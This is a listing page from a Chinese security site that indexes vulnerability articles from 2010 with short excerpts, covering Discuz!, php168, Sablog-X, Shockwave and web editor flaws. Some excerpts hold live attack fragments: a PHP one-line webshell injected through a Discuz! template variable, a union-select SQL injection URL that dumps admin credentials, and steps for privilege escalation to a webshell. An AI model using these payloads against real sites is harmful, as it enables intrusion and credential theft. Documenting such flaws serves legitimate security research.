首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>漏洞资料>列表
Discuz! 6.x/7.x 全局变量防御绕过漏洞
  日期:2010-05-19 11:06:24 点击:67 评论:0
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞 include/global.func.php代码里: function daddslashes($string, $force = 0) { !defined('MAGIC_QUOTES_GPC') define('MAGIC_QUOTES_GPC', get_magic_quotes_g
New Includes Function -- spl_autoload()
  日期:2010-05-17 14:48:30 点击:97 评论:0
New Includes Function -- spl_autoload() author: ryat#www.wolvez.org team:http://www.80vul.com date:2009-04-13 一、描述 看看手册对这个函数的描述: spl_autoload (PHP 5 = 5.1.2) spl_autoload Default implementation for __autoload() void spl_autoload ( st
当magic_quotes_gpc=off
  日期:2010-05-17 14:45:33 点击:115 评论:0
当magic_quotes_gpc=off author: ryat#www.wolvez.org team:http://www.80vul.com date:2009-04-10 一、综述 magic_quotes_gpc是php中的一个安全选项,在php manual中对此有如下描述: When on, all ' (single-quote), (double quote), (backslash) and NULL character
关于magic_quotes_sybase
  日期:2010-05-17 14:45:09 点击:133 评论:0
关于magic_quotes_sybase author: ryat#wolvez.org team:http://www.80vul.com date:2009-04-14 一 描叙 magic_quotes_gpc为on时,php在注册变量时会调用addslashes()函数处理[既转义单引号、双引号、反斜线和nullbyte],但php.ini中还有另外一个选项影响着magic_quotes_
ZIP 文件溢出漏洞
  日期:2010-05-13 10:43:33 点击:112 评论:0
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! ?php/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Zip Unzip v6 (.zip) 0day stack buffer overflow PoC exploitAuthor: mr_me - http://net-ninja.net/Downlo
[CAL-20100204-3]Adobe Shockwave Player Director文件分析RCSL指针覆盖漏洞
  日期:2010-05-13 10:40:47 点击:61 评论:0
[CAL-20100204-3]Adobe Shockwave Player Director文件分析RCSL指针覆盖漏洞 影响版本 ========= 11.5.2.602 ,11.5.6.606 and prior CVE ID: CVE-2010-1280 CAL ID: CAL-20100204-3 漏洞描述 ========= Code Audit Labs http://www.vulnhunt.com 在Adobe's Shockwave P
[CAL-20100204-2]Adobe Shockwave Player Director文件分析整型溢出漏洞
  日期:2010-05-13 10:40:06 点击:71 评论:0
[CAL-20100204-2]Adobe Shockwave Player Director文件分析整型溢出漏洞 影响版本 ======== 11.5.2.602 ,11.5.6.606 and prior CVE ID: CVE-2010-0129 CAL ID: CAL-20100204-2 漏洞描述 ========= Code Audit Labs http://www.vulnhunt.com 在Adobe's Shockwave Player
[CAL-20100204-1]Adobe Shockwave Player Director文件分析ATOM size无限循环漏洞
  日期:2010-05-13 10:38:31 点击:45 评论:0
[CAL-20100204-1]Adobe Shockwave Player Director文件分析ATOM size无限循环漏洞 影响版本 ======== 11.5.2.602 ,11.5.6.606 and prior CVE ID: CVE-2010-1282 CAL ID: CAL-20100204-1 漏洞描述 ======== Code Audit Labs http://www.vulnhunt.com 在Adobe's Shockwav
php168 获取管理员0day
  日期:2010-05-04 12:08:49 点击:229 评论:0
由于php168程序对用户组权限购买处理不当,使普通用户具有购买管理员权限 ,从而获得管理权限 。 漏洞利用: 1.注册普通用户 2.通过 http://www.xxx.com/member/buygroup.php?job=buygid=3 购买管理员权限 。 3.后台 拿webshell 漏洞分析 +修复方法: 需要修改到的文件
discuz! 7.0 及以下版本后台拿webshell
  日期:2010-04-12 10:57:53 点击:159 评论:0
不需要创始人,只需要管理员。 http://www.fuck.com/admincp.php?action=stylesoperation=editid=1adv=1 中,最下面有个自定义模板变量,变量中填: PHP代码 OLDJUN ',' #999'); eval ( $_POST [cmd]); // 替换内容随便输入:1111,然后提交,一句话木马就产生了: htt
新云4.0注册上传漏洞
  日期:2010-03-12 10:25:04 点击:1250 评论:0
转自: http://hi.baidu.com/seraph1221/blog/item/2fc0f9d3ba58fdd4a9ec9afe.html 先下载一个 serawebinfo 把下面配置文件保存为(xunyun.seraph) url=http://localhost/users/upload.asp?action=saveChannelID=1sType= filefield=File1 filefield2= filename=2009816
网页编辑器漏洞手册(全面版)
  日期:2010-03-12 10:24:18 点击:200 评论:0
FCKeditor FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=
科讯 v6.5 CMS Oday
  日期:2010-03-12 10:22:30 点击:93 评论:0
后台:写入网站kesion目录如http://localhost cookies:登录后抓取到的USER的COOKIS 帐号密码:注册后可以正常登录的用户名密码 验证码:登录时的验证码,抓图后填入 操作,先输入网站,先在网站注册一个正常用户,可以直接写入帐号密码,得到验证码图片后登录后上传,也可
快客电邮(QuarkMail)最新远程漏洞
  日期:2010-03-08 10:31:44 点击:177 评论:2
漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案(该产品的主要客户名单http://www.ipmotor.com/cases/cases.html), 其webmail部分使用perl cgi编写,近日笔者在渗透测试过程当中发现一处严重的安全
鼎峰企业智能建站系统注入搜索注入漏洞分析与利用
  日期:2010-03-05 12:21:59 点击:69 评论:0
作者: L4nk0r[莫ㄨ问] 昨天利用这个系统拿了一个webshell,但是是利用下载默认数据库的,后面发现者这套系统界面搞得还不错,就顺便看下它的安全性了。本文就其搜索注入漏洞简单分析和利用,及批量拿shell。 一.简单分析 漏洞文件:zm_search.asp代码如下 t=Request.F
搜狗浏览器“页面欺骗”漏洞
  日期:2010-03-01 12:55:29 点击:76 评论:0
搜狗浏览器版本 :1.4.0.418(正式版) 漏洞成因 :在搜狗浏览器中,window.location和document.write两个函数发生条件竞争阻塞。window.location函数使URL中显示到一个地址域,同时页面元素却可以被document.write函数所改写。这样导致攻击者可以篡改页面,来实施钓鱼欺
远程包含和本地包含漏洞的原理
  日期:2010-03-01 12:54:44 点击:60 评论:0
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是远程文件包含漏洞?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这
Sablog-X 2.X 后台管理权限欺骗漏洞
  日期:2010-02-25 16:49:28 点击:48 评论:0
Sablog-X 2.X 后台管理权限欺骗漏洞by Ryat[puretot]mail: puretot at gmail dot comteam: http://www.80vul.comdata: 2010/2/24一 描叙:由于Sablog-x v2.x的后台认证过程存在严重的逻辑问题,导致构造特殊的cookie直接登录后台。二 分析 :// cp.phpif (!$sax_uid ||
Sablog-X v2.x 任意变量覆盖漏洞
  日期:2010-02-22 11:24:24 点击:60 评论:0
Sablog-X v2.x 任意变量覆盖漏洞author: 80vul-Bteam:http://www.80vul.com一 描叙:由于Sablog-x v2.x的common.inc.php里 ___FCKpd___0 EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。二 分
MASA2EL Music City v1.0远程注入漏洞+利用代码
  日期:2010-02-08 10:45:17 点击:69 评论:0
google: Powered By : MASA2EL Music City 1.0 Exploit:http://server/path/index.php?go=singerid=-13/**/union/**/select/**/1,concat(UserName,0x3a,PasSword),3,4/**/from/**/masa2el_admin--
共37页/730条记录 首页 上一页 [13] [14] [15] 16 [17] [18] [19] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  入侵实例
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
漏洞资料
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved